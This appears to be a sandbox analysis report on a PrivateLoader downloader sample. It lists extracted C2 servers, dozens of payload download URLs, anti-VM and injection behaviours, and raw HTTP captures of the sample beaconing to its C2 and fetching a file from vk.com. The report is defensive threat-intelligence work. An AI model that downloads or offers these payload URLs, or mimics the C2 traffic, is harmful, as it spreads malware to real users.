Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    139s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03/01/2023, 12:25 UTC

General

  • Target

    044d2fde888aaa73c7a60076d4c93cb72d2c5f1ebfbdca29732ae85d0ba3fce9.exe

  • Size

    4.0MB

  • MD5

    3134fa9cea6fd7071133d85a5fb4f04e

  • SHA1

    bc8428fa442bc143aaa444e98dae698f440abc3e

  • SHA256

    044d2fde888aaa73c7a60076d4c93cb72d2c5f1ebfbdca29732ae85d0ba3fce9

  • SHA512

    e0d7e8f40bae193d484ef67342280c10c3223af3ebae7ae8285535435871e145e5a57c3e04944eb7d6df9688e7273e15066cb6748d26fd1015f4f820ae162be8

  • SSDEEP

    98304:706FB3Lep0AUPnz1GWObOOdbvUcPIPaatXQK2ApRE9Zea:7FL3Lk0AUPpGVbdbcyEtXWAzE9ka

Malware Config

Extracted

Family

privateloader

C2

http://91.241.19.125/pub.php?pub=one

http://sarfoods.com/index.php

208.67.104.60

Attributes
  • payload_url

    https://cdn.discordapp.com/attachments/910842184708792331/931507465563045909/dingo_20220114120058.bmp

    https://c.xyzgamec.com/userdown/2202/random.exe

    http://193.56.146.76/Proxytest.exe

    http://www.yzsyjyjh.com/askhelp23/askinstall23.exe

    http://privacy-tools-for-you-780.com/downloads/toolspab3.exe

    http://luminati-china.xyz/aman/casper2.exe

    https://innovicservice.net/assets/vendor/counterup/RobCleanerInstlr95038215.exe

    http://tg8.cllgxx.com/hp8/g1/yrpp1047.exe

    https://cdn.discordapp.com/attachments/910842184708792331/930849718240698368/Roll.bmp

    https://cdn.discordapp.com/attachments/910842184708792331/930850766787330068/real1201.bmp

    https://cdn.discordapp.com/attachments/910842184708792331/930882959131693096/Installer.bmp

    http://185.215.113.208/ferrari.exe

    https://cdn.discordapp.com/attachments/910842184708792331/931233371110141962/LingeringsAntiphon.bmp

    https://cdn.discordapp.com/attachments/910842184708792331/931285223709225071/russ.bmp

    https://cdn.discordapp.com/attachments/910842184708792331/932720393201016842/filinnn.bmp

    https://cdn.discordapp.com/attachments/910842184708792331/933436611427979305/build20k.bmp

    https://c.xyzgamec.com/userdown/2202/random.exe

    http://mnbuiy.pw/adsli/note8876.exe

    http://www.yzsyjyjh.com/askhelp23/askinstall23.exe

    http://luminati-china.xyz/aman/casper2.exe

    https://suprimax.vet.br/css/fonts/OneCleanerInst942914.exe

    http://tg8.cllgxx.com/hp8/g1/ssaa1047.exe

    https://www.deezloader.app/files/Deezloader_Remix_Installer_64_bit_4.3.0_Setup.exe

    https://www.deezloader.app/files/Deezloader_Remix_Installer_32_bit_4.3.0_Setup.exe

    https://cdn.discordapp.com/attachments/910281601559167006/911516400005296219/anyname.exe

    https://cdn.discordapp.com/attachments/910281601559167006/911516894660530226/PBsecond.exe

    https://cdn.discordapp.com/attachments/910842184708792331/914047763304550410/Xpadder.bmp

Signatures

  • PrivateLoader

    PrivateLoader is a downloader sold as a pay-per-install malware distribution service.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Themida packer 2 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\044d2fde888aaa73c7a60076d4c93cb72d2c5f1ebfbdca29732ae85d0ba3fce9.exe
    "C:\Users\Admin\AppData\Local\Temp\044d2fde888aaa73c7a60076d4c93cb72d2c5f1ebfbdca29732ae85d0ba3fce9.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks whether UAC is enabled
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1376
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
      2⤵
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      PID:3796
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
    1⤵
      PID:1464
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
      1⤵
        PID:1484

      Network

      • flag-unknown
        DNS
        metazone1.com
        InstallUtil.exe
        Remote address:
        8.8.8.8:53
        Request
        metazone1.com
        IN A
        Response
        metazone1.com
        IN A
        31.31.196.244
      • flag-unknown
        GET
        http://metazone1.com/api/tracemap.php
        InstallUtil.exe
        Remote address:
        31.31.196.244:80
        Request
        GET /api/tracemap.php HTTP/1.1
        Connection: Keep-Alive
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
        Host: metazone1.com
        Response
        HTTP/1.1 403 Forbidden
        Server: nginx
        Date: Tue, 03 Jan 2023 12:26:17 GMT
        Content-Type: text/html
        Content-Length: 201400
        Connection: keep-alive
        Vary: Accept-Encoding
        ETag: "61cc0a19-312b8"
      • flag-unknown
        DNS
        meta-zone-1.ru
        InstallUtil.exe
        Remote address:
        8.8.8.8:53
        Request
        meta-zone-1.ru
        IN A
        Response
        meta-zone-1.ru
        IN A
        31.31.196.244
      • flag-unknown
        GET
        http://meta-zone-1.ru/api/tracemap.php
        InstallUtil.exe
        Remote address:
        31.31.196.244:80
        Request
        GET /api/tracemap.php HTTP/1.1
        Connection: Keep-Alive
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
        Host: meta-zone-1.ru
        Response
        HTTP/1.1 403 Forbidden
        Server: nginx
        Date: Tue, 03 Jan 2023 12:26:18 GMT
        Content-Type: text/html
        Content-Length: 201400
        Connection: keep-alive
        Vary: Accept-Encoding
        ETag: "61cc0a19-312b8"
      • flag-unknown
        DNS
        meta-zone-1.online
        InstallUtil.exe
        Remote address:
        8.8.8.8:53
        Request
        meta-zone-1.online
        IN A
        Response
        meta-zone-1.online
        IN A
        31.31.196.244
      • flag-unknown
        GET
        http://meta-zone-1.online/api/tracemap.php
        InstallUtil.exe
        Remote address:
        31.31.196.244:80
        Request
        GET /api/tracemap.php HTTP/1.1
        Connection: Keep-Alive
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
        Host: meta-zone-1.online
        Response
        HTTP/1.1 403 Forbidden
        Server: nginx
        Date: Tue, 03 Jan 2023 12:26:18 GMT
        Content-Type: text/html
        Content-Length: 201400
        Connection: keep-alive
        Vary: Accept-Encoding
        ETag: "61cc0a19-312b8"
      • flag-unknown
        GET
        http://208.67.104.60/api/tracemap.php
        InstallUtil.exe
        Remote address:
        208.67.104.60:80
        Request
        GET /api/tracemap.php HTTP/1.1
        Connection: Keep-Alive
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
        Host: 208.67.104.60
        Response
        HTTP/1.1 200 OK
        Date: Tue, 03 Jan 2023 12:26:19 GMT
        Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
        X-Powered-By: PHP/7.4.29
        Content-Length: 15
        Keep-Alive: timeout=5, max=100
        Connection: Keep-Alive
        Content-Type: text/html; charset=UTF-8
      • flag-unknown
        POST
        http://208.67.104.60/api/firegate.php
        InstallUtil.exe
        Remote address:
        208.67.104.60:80
        Request
        POST /api/firegate.php HTTP/1.1
        Connection: Keep-Alive
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
        Content-Length: 413
        Host: 208.67.104.60
        Response
        HTTP/1.1 200 OK
        Date: Tue, 03 Jan 2023 12:26:19 GMT
        Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
        X-Powered-By: PHP/7.4.29
        Content-Length: 0
        Keep-Alive: timeout=5, max=99
        Connection: Keep-Alive
        Content-Type: text/html; charset=UTF-8
      • flag-unknown
        POST
        http://208.67.104.60/api/firegate.php
        InstallUtil.exe
        Remote address:
        208.67.104.60:80
        Request
        POST /api/firegate.php HTTP/1.1
        Connection: Keep-Alive
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
        Content-Length: 413
        Host: 208.67.104.60
        Response
        HTTP/1.1 200 OK
        Date: Tue, 03 Jan 2023 12:26:20 GMT
        Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
        X-Powered-By: PHP/7.4.29
        Content-Length: 0
        Keep-Alive: timeout=5, max=98
        Connection: Keep-Alive
        Content-Type: text/html; charset=UTF-8
      • flag-unknown
        POST
        http://208.67.104.60/api/firegate.php
        InstallUtil.exe
        Remote address:
        208.67.104.60:80
        Request
        POST /api/firegate.php HTTP/1.1
        Connection: Keep-Alive
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
        Content-Length: 413
        Host: 208.67.104.60
        Response
        HTTP/1.1 200 OK
        Date: Tue, 03 Jan 2023 12:26:20 GMT
        Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
        X-Powered-By: PHP/7.4.29
        Content-Length: 0
        Keep-Alive: timeout=5, max=97
        Connection: Keep-Alive
        Content-Type: text/html; charset=UTF-8
      • flag-unknown
        POST
        http://208.67.104.60/api/firegate.php
        InstallUtil.exe
        Remote address:
        208.67.104.60:80
        Request
        POST /api/firegate.php HTTP/1.1
        Connection: Keep-Alive
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
        Content-Length: 413
        Host: 208.67.104.60
        Response
        HTTP/1.1 200 OK
        Date: Tue, 03 Jan 2023 12:26:20 GMT
        Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
        X-Powered-By: PHP/7.4.29
        Content-Length: 0
        Keep-Alive: timeout=5, max=96
        Connection: Keep-Alive
        Content-Type: text/html; charset=UTF-8
      • flag-unknown
        POST
        http://208.67.104.60/api/firegate.php
        InstallUtil.exe
        Remote address:
        208.67.104.60:80
        Request
        POST /api/firegate.php HTTP/1.1
        Connection: Keep-Alive
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
        Content-Length: 413
        Host: 208.67.104.60
        Response
        HTTP/1.1 200 OK
        Date: Tue, 03 Jan 2023 12:26:20 GMT
        Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
        X-Powered-By: PHP/7.4.29
        Content-Length: 0
        Keep-Alive: timeout=5, max=95
        Connection: Keep-Alive
        Content-Type: text/html; charset=UTF-8
      • flag-unknown
        POST
        http://208.67.104.60/api/firegate.php
        InstallUtil.exe
        Remote address:
        208.67.104.60:80
        Request
        POST /api/firegate.php HTTP/1.1
        Connection: Keep-Alive
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
        Content-Length: 133
        Host: 208.67.104.60
        Response
        HTTP/1.1 200 OK
        Date: Tue, 03 Jan 2023 12:26:20 GMT
        Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
        X-Powered-By: PHP/7.4.29
        Content-Length: 0
        Keep-Alive: timeout=5, max=94
        Connection: Keep-Alive
        Content-Type: text/html; charset=UTF-8
      • flag-unknown
        POST
        http://208.67.104.60/api/firegate.php
        InstallUtil.exe
        Remote address:
        208.67.104.60:80
        Request
        POST /api/firegate.php HTTP/1.1
        Connection: Keep-Alive
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
        Content-Length: 133
        Host: 208.67.104.60
        Response
        HTTP/1.1 200 OK
        Date: Tue, 03 Jan 2023 12:26:20 GMT
        Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
        X-Powered-By: PHP/7.4.29
        Content-Length: 0
        Keep-Alive: timeout=5, max=93
        Connection: Keep-Alive
        Content-Type: text/html; charset=UTF-8
      • flag-unknown
        POST
        http://208.67.104.60/api/firegate.php
        InstallUtil.exe
        Remote address:
        208.67.104.60:80
        Request
        POST /api/firegate.php HTTP/1.1
        Connection: Keep-Alive
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
        Content-Length: 133
        Host: 208.67.104.60
        Response
        HTTP/1.1 200 OK
        Date: Tue, 03 Jan 2023 12:26:21 GMT
        Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
        X-Powered-By: PHP/7.4.29
        Content-Length: 0
        Keep-Alive: timeout=5, max=92
        Connection: Keep-Alive
        Content-Type: text/html; charset=UTF-8
      • flag-unknown
        POST
        http://208.67.104.60/api/firegate.php
        InstallUtil.exe
        Remote address:
        208.67.104.60:80
        Request
        POST /api/firegate.php HTTP/1.1
        Connection: Keep-Alive
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
        Content-Length: 133
        Host: 208.67.104.60
        Response
        HTTP/1.1 200 OK
        Date: Tue, 03 Jan 2023 12:26:21 GMT
        Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
        X-Powered-By: PHP/7.4.29
        Content-Length: 0
        Keep-Alive: timeout=5, max=91
        Connection: Keep-Alive
        Content-Type: text/html; charset=UTF-8
      • flag-unknown
        POST
        http://208.67.104.60/api/firegate.php
        InstallUtil.exe
        Remote address:
        208.67.104.60:80
        Request
        POST /api/firegate.php HTTP/1.1
        Connection: Keep-Alive
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
        Content-Length: 133
        Host: 208.67.104.60
        Response
        HTTP/1.1 200 OK
        Date: Tue, 03 Jan 2023 12:26:21 GMT
        Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
        X-Powered-By: PHP/7.4.29
        Content-Length: 0
        Keep-Alive: timeout=5, max=90
        Connection: Keep-Alive
        Content-Type: text/html; charset=UTF-8
      • flag-unknown
        POST
        http://208.67.104.60/api/firegate.php
        InstallUtil.exe
        Remote address:
        208.67.104.60:80
        Request
        POST /api/firegate.php HTTP/1.1
        Connection: Keep-Alive
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
        Content-Length: 133
        Host: 208.67.104.60
        Response
        HTTP/1.1 200 OK
        Date: Tue, 03 Jan 2023 12:26:22 GMT
        Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
        X-Powered-By: PHP/7.4.29
        Content-Length: 0
        Keep-Alive: timeout=5, max=89
        Connection: Keep-Alive
        Content-Type: text/html; charset=UTF-8
      • flag-unknown
        POST
        http://208.67.104.60/api/firegate.php
        InstallUtil.exe
        Remote address:
        208.67.104.60:80
        Request
        POST /api/firegate.php HTTP/1.1
        Connection: Keep-Alive
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
        Content-Length: 133
        Host: 208.67.104.60
        Response
        HTTP/1.1 200 OK
        Date: Tue, 03 Jan 2023 12:26:23 GMT
        Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
        X-Powered-By: PHP/7.4.29
        Content-Length: 0
        Keep-Alive: timeout=5, max=88
        Connection: Keep-Alive
        Content-Type: text/html; charset=UTF-8
      • flag-unknown
        POST
        http://208.67.104.60/api/firegate.php
        InstallUtil.exe
        Remote address:
        208.67.104.60:80
        Request
        POST /api/firegate.php HTTP/1.1
        Connection: Keep-Alive
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
        Content-Length: 133
        Host: 208.67.104.60
        Response
        HTTP/1.1 200 OK
        Date: Tue, 03 Jan 2023 12:26:23 GMT
        Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
        X-Powered-By: PHP/7.4.29
        Content-Length: 0
        Keep-Alive: timeout=5, max=87
        Connection: Keep-Alive
        Content-Type: text/html; charset=UTF-8
      • flag-unknown
        POST
        http://208.67.104.60/api/firegate.php
        InstallUtil.exe
        Remote address:
        208.67.104.60:80
        Request
        POST /api/firegate.php HTTP/1.1
        Connection: Keep-Alive
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
        Content-Length: 133
        Host: 208.67.104.60
        Response
        HTTP/1.1 200 OK
        Date: Tue, 03 Jan 2023 12:26:23 GMT
        Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
        X-Powered-By: PHP/7.4.29
        Content-Length: 0
        Keep-Alive: timeout=5, max=86
        Connection: Keep-Alive
        Content-Type: text/html; charset=UTF-8
      • flag-unknown
        POST
        http://208.67.104.60/api/firegate.php
        InstallUtil.exe
        Remote address:
        208.67.104.60:80
        Request
        POST /api/firegate.php HTTP/1.1
        Connection: Keep-Alive
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
        Content-Length: 133
        Host: 208.67.104.60
        Response
        HTTP/1.1 200 OK
        Date: Tue, 03 Jan 2023 12:26:23 GMT
        Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
        X-Powered-By: PHP/7.4.29
        Content-Length: 0
        Keep-Alive: timeout=5, max=85
        Connection: Keep-Alive
        Content-Type: text/html; charset=UTF-8
      • flag-unknown
        DNS
        ipinfo.io
        InstallUtil.exe
        Remote address:
        8.8.8.8:53
        Request
        ipinfo.io
        IN A
        Response
        ipinfo.io
        IN A
        34.117.59.81
      • flag-unknown
        GET
        https://ipinfo.io/widget
        InstallUtil.exe
        Remote address:
        34.117.59.81:443
        Request
        GET /widget HTTP/1.1
        Connection: Keep-Alive
        Referer: https://ipinfo.io/
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
        Host: ipinfo.io
        Response
        HTTP/1.1 200 OK
        access-control-allow-origin: *
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        x-content-type-options: nosniff
        referrer-policy: strict-origin-when-cross-origin
        content-type: application/json; charset=utf-8
        content-length: 912
        date: Tue, 03 Jan 2023 12:26:19 GMT
        x-envoy-upstream-service-time: 35
        strict-transport-security: max-age=2592000; includeSubDomains
        vary: Accept-Encoding
        Via: 1.1 google
        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
      • flag-unknown
        DNS
        vk.com
        InstallUtil.exe
        Remote address:
        8.8.8.8:53
        Request
        vk.com
        IN A
        Response
        vk.com
        IN A
        87.240.137.164
        vk.com
        IN A
        87.240.129.133
        vk.com
        IN A
        87.240.132.72
        vk.com
        IN A
        87.240.132.67
        vk.com
        IN A
        87.240.132.78
        vk.com
        IN A
        93.186.225.194
      • flag-unknown
        GET
        https://vk.com/doc746114504_647280747?hash=cvDFKP5q0CQEjBCbeoeHvPNrWE0xbMxZEmrkIeNKcET&dl=G42DMMJRGQ2TANA:1661413520:uZNj68vRUvQaydRD8wpAK8zluN0I7otw5AHbA1ZlN9T&api=1&no_preview=1
        InstallUtil.exe
        Remote address:
        87.240.137.164:443
        Request
        GET /doc746114504_647280747?hash=cvDFKP5q0CQEjBCbeoeHvPNrWE0xbMxZEmrkIeNKcET&dl=G42DMMJRGQ2TANA:1661413520:uZNj68vRUvQaydRD8wpAK8zluN0I7otw5AHbA1ZlN9T&api=1&no_preview=1 HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
        Host: vk.com
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        Server: kittenx
        Date: Tue, 03 Jan 2023 12:26:22 GMT
        Content-Type: text/html; charset=windows-1251
        Content-Length: 139003
        Connection: keep-alive
        X-Powered-By: KPHP/7.4.113006
        Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly
        Set-Cookie: remixlang=3; expires=Mon, 08 Jan 2024 19:52:31 GMT; path=/; domain=.vk.com
        Set-Cookie: remixstlid=9092856945242514274_TyUVALahm7RTRK4ZBUn3eTSSFWwg97pxXF61BoNGDZk; expires=Wed, 03 Jan 2024 12:26:22 GMT; path=/; domain=.vk.com; secure
        Set-Cookie: remixstid=1407836848_epszTabxfTZZLDQZzcDu9R70qzgke0rzJmmgiRIz0EH; expires=Sat, 06 Jan 2024 01:28:54 GMT; path=/; domain=.vk.com; secure
        Set-Cookie: remixlgck=e5ec174678d6eb2f90; expires=Sat, 06 Jan 2024 08:07:55 GMT; path=/; domain=.vk.com; secure; HttpOnly
        Cache-control: no-store
        X-Robots-Tag: noindex,nofollow
        Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline';report-uri /csp
        X-XSS-Protection: 1; report=/xss_reports
        X-Frame-Options: deny
        X-Frontend: front605107
        Strict-Transport-Security: max-age=15768000
        Access-Control-Expose-Headers: X-Frontend
      • 209.197.3.8:80
        322 B
        7
      • 31.31.196.244:80
        http://metazone1.com/api/tracemap.php
        http
        InstallUtil.exe
        3.8kB
        207.7kB
        79
        151

        HTTP Request

        GET http://metazone1.com/api/tracemap.php

        HTTP Response

        403
      • 31.31.196.244:80
        http://meta-zone-1.ru/api/tracemap.php
        http
        InstallUtil.exe
        3.8kB
        207.7kB
        79
        151

        HTTP Request

        GET http://meta-zone-1.ru/api/tracemap.php

        HTTP Response

        403
      • 31.31.196.244:80
        http://meta-zone-1.online/api/tracemap.php
        http
        InstallUtil.exe
        3.9kB
        208.0kB
        80
        152

        HTTP Request

        GET http://meta-zone-1.online/api/tracemap.php

        HTTP Response

        403
      • 208.67.104.60:80
        http://208.67.104.60/api/firegate.php
        http
        InstallUtil.exe
        9.9kB
        5.4kB
        49
        32

        HTTP Request

        GET http://208.67.104.60/api/tracemap.php

        HTTP Response

        200

        HTTP Request

        POST http://208.67.104.60/api/firegate.php

        HTTP Response

        200

        HTTP Request

        POST http://208.67.104.60/api/firegate.php

        HTTP Response

        200

        HTTP Request

        POST http://208.67.104.60/api/firegate.php

        HTTP Response

        200

        HTTP Request

        POST http://208.67.104.60/api/firegate.php

        HTTP Response

        200

        HTTP Request

        POST http://208.67.104.60/api/firegate.php

        HTTP Response

        200

        HTTP Request

        POST http://208.67.104.60/api/firegate.php

        HTTP Response

        200

        HTTP Request

        POST http://208.67.104.60/api/firegate.php

        HTTP Response

        200

        HTTP Request

        POST http://208.67.104.60/api/firegate.php

        HTTP Response

        200

        HTTP Request

        POST http://208.67.104.60/api/firegate.php

        HTTP Response

        200

        HTTP Request

        POST http://208.67.104.60/api/firegate.php

        HTTP Response

        200

        HTTP Request

        POST http://208.67.104.60/api/firegate.php

        HTTP Response

        200

        HTTP Request

        POST http://208.67.104.60/api/firegate.php

        HTTP Response

        200

        HTTP Request

        POST http://208.67.104.60/api/firegate.php

        HTTP Response

        200

        HTTP Request

        POST http://208.67.104.60/api/firegate.php

        HTTP Response

        200

        HTTP Request

        POST http://208.67.104.60/api/firegate.php

        HTTP Response

        200
      • 34.117.59.81:443
        https://ipinfo.io/widget
        tls, http
        InstallUtil.exe
        923 B
        6.8kB
        9
        10

        HTTP Request

        GET https://ipinfo.io/widget

        HTTP Response

        200
      • 87.240.137.164:80
        vk.com
        tls
        InstallUtil.exe
        449 B
        553 B
        6
        5
      • 87.240.137.164:80
        vk.com
        tls
        InstallUtil.exe
        395 B
        553 B
        6
        5
      • 87.240.137.164:80
        vk.com
        InstallUtil.exe
        190 B
        92 B
        4
        2
      • 87.240.137.164:443
        https://vk.com/doc746114504_647280747?hash=cvDFKP5q0CQEjBCbeoeHvPNrWE0xbMxZEmrkIeNKcET&dl=G42DMMJRGQ2TANA:1661413520:uZNj68vRUvQaydRD8wpAK8zluN0I7otw5AHbA1ZlN9T&api=1&no_preview=1
        tls, http
        InstallUtil.exe
        5.9kB
        150.1kB
        115
        113

        HTTP Request

        GET https://vk.com/doc746114504_647280747?hash=cvDFKP5q0CQEjBCbeoeHvPNrWE0xbMxZEmrkIeNKcET&dl=G42DMMJRGQ2TANA:1661413520:uZNj68vRUvQaydRD8wpAK8zluN0I7otw5AHbA1ZlN9T&api=1&no_preview=1

        HTTP Response

        200
      • 20.189.173.14:443
        322 B
        7
      • 93.184.221.240:80
        322 B
        7
      • 93.184.221.240:80
        322 B
        7
      • 8.8.8.8:53
        metazone1.com
        dns
        InstallUtil.exe
        59 B
        75 B
        1
        1

        DNS Request

        metazone1.com

        DNS Response

        31.31.196.244

      • 224.0.0.251:5353
        158 B
        2
      • 8.8.8.8:53
        meta-zone-1.ru
        dns
        InstallUtil.exe
        60 B
        76 B
        1
        1

        DNS Request

        meta-zone-1.ru

        DNS Response

        31.31.196.244

      • 8.8.8.8:53
        meta-zone-1.online
        dns
        InstallUtil.exe
        64 B
        80 B
        1
        1

        DNS Request

        meta-zone-1.online

        DNS Response

        31.31.196.244

      • 8.8.8.8:53
        ipinfo.io
        dns
        InstallUtil.exe
        55 B
        71 B
        1
        1

        DNS Request

        ipinfo.io

        DNS Response

        34.117.59.81

      • 8.8.8.8:53
        vk.com
        dns
        InstallUtil.exe
        52 B
        148 B
        1
        1

        DNS Request

        vk.com

        DNS Response

        87.240.137.164
        87.240.129.133
        87.240.132.72
        87.240.132.67
        87.240.132.78
        93.186.225.194

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/1376-144-0x00007FFA252F0000-0x00007FFA254E5000-memory.dmp

        Filesize

        2.0MB

      • memory/1376-143-0x0000000000A50000-0x0000000001612000-memory.dmp

        Filesize

        11.8MB

      • memory/1376-135-0x00007FFA252F0000-0x00007FFA254E5000-memory.dmp

        Filesize

        2.0MB

      • memory/1376-136-0x00007FFA07300000-0x00007FFA07DC1000-memory.dmp

        Filesize

        10.8MB

      • memory/1376-137-0x0000000000A50000-0x0000000001612000-memory.dmp

        Filesize

        11.8MB

      • memory/1376-138-0x00007FFA252F0000-0x00007FFA254E5000-memory.dmp

        Filesize

        2.0MB

      • memory/1376-134-0x0000000000A50000-0x0000000001612000-memory.dmp

        Filesize

